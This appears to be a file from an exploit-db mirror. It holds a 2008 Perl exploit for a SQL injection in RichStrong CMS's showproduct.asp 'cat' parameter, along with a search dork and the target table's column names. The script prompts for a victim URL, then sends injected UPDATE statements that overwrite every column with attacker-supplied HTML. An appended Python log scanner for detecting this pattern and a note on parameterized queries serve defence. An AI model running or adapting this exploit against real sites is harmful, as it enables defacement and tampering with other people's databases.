exploit-db-mirror/platforms/asp/webapps/4910.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

136 lines
3.4 KiB
Perl
Executable file

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: RichStrong CMS
[~] HomePage: http://www.hzrich.cn
[~] Exploit: Remote Sql Injection [High]
[~] Where: showproduct.asp?cat=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Power by:RichStrong CMS"
[~] Dork2: Priv8, xD!
[+] Tables:
[*] Table 1: subject
[+] Columns:
[*] Column 1: id
[*] Column 2: subjectname
[*] Column 3: subjecttype
[*] Column 4: displayorder
[*] Column 5: description
[*] Column 6: layout
[*] Column 7: style
[*] Column 8: category
[*] Column 9: workflowID_R
[*] Column 10: workflowID_S
[*] Column 11: status
[*] Column 12: owner
[*] Column 13: isinherit
[*] Column 14: doclistcount
[*] Column 15: docstyle
[*] Column 16: docsecrettype
[*] Column 17: docpubdays
[*] Column 18: wwwname
[*] Column 19: logo
[*] Column 20: contactus
[+] Exploit:
#!/usr/bin/perl
# RichStrong CMS - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RichStrong CMS - Remote SQL Injection Exploit - By JosS");
system ("color 02");
}
}
#*************************** expl ******************************
&lw;
print "\t\t########################################################\n\n";
print "\t\t# RichStrong CMS - Remote SQL Injection Exploit #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";
print "Url Victim (Ex: www.localhost/showproduct.asp?cat=): ";
$host=<STDIN>;
chomp $host;
print "\n";
if ( $host !~ /^http:/ ) {
# add the scheme prefix
$host = 'http://' . $host;
}
print "Message: ";
$message=<STDIN>;
chomp $message;
print "\n";
@columnas=("id","subjectname","subjecttype","displayorder","description","layout","style","category","workflowID_R","workflowID_S","status","owner",
"isinherit","doclistcount","docstyle","docsecrettype","docpubdays","wwwname","logo","contactus");
for ($i=0;$i<=21;$i++)
{
$comando="'%20update%20subject%20set%20$columnas[$i]='<h1>$message'--";
$comando =~ s/ /+/g;
my $final = $host.$comando;
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "update: $columnas[$i]\n";
}
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-01-14]
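
[+] Detection (added example, not part of the original advisory or of JosS's code):
The script above sends one request per column of the subject table, each carrying a quote breakout followed by an UPDATE in the cat parameter of showproduct.asp. The Python sketch below flags that pattern in web server logs. The seven-field log layout, the function names and the sample lines are constructed assumptions for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample lines (assumed layout):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-01-14 10:00:01 198.51.100.7 GET /showproduct.asp cat=12 200
2008-01-14 10:00:05 203.0.113.9 GET /showproduct.asp cat='+update+subject+set+id='<h1>x'-- 500
2008-01-14 10:00:05 203.0.113.9 GET /ShowProduct.asp cat='%20update%20subject%20set%20logo='<h1>x'-- 200
2008-01-14 10:00:09 198.51.100.7 GET /showproduct.asp cat=O'Neil 200
2008-01-14 10:00:11 198.51.100.7 GET /index.asp q=update+subject 200
"""

# A quote that closes the string literal, followed by a data-modifying verb.
BREAKOUT = re.compile(r"'\s*;?\s*(update|insert|delete|drop|exec)\b", re.I)
# Table and column named by an injected UPDATE ... SET.
UPDATE_COL = re.compile(r"\bupdate\s+(\w+)\s+set\s+(\w+)\s*=", re.I)


def scan(log_text, stem="/showproduct.asp", param="cat"):
    """Return {client_ip: {(table, column), ...}} for injected writes."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        # IIS paths are case-insensitive, so compare the stem lowercased.
        if len(fields) != 7 or fields[4].lower() != stem:
            continue
        ip, query = fields[2], fields[5]
        # parse_qs URL-decodes the value and turns '+' into a space.
        for value in parse_qs(query).get(param, []):
            if not BREAKOUT.search(value):
                continue  # a lone quote (e.g. O'Neil) is not enough
            m = UPDATE_COL.search(value)
            hits[ip].add((m.group(1).lower(), m.group(2).lower()) if m else ("?", "?"))
    return dict(hits)


def sweeping_clients(hits, min_columns=2):
    """Clients that targeted several columns, as the per-column loop does."""
    return sorted(ip for ip, cols in hits.items() if len(cols) >= min_columns)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip in sweeping_clients(found):
        print(ip, sorted(found[ip]))
```

A hit on this rule also means the cat parameter reaches the database unparameterized, so the page's query should be rebuilt with bound parameters and the subject table checked for overwritten values.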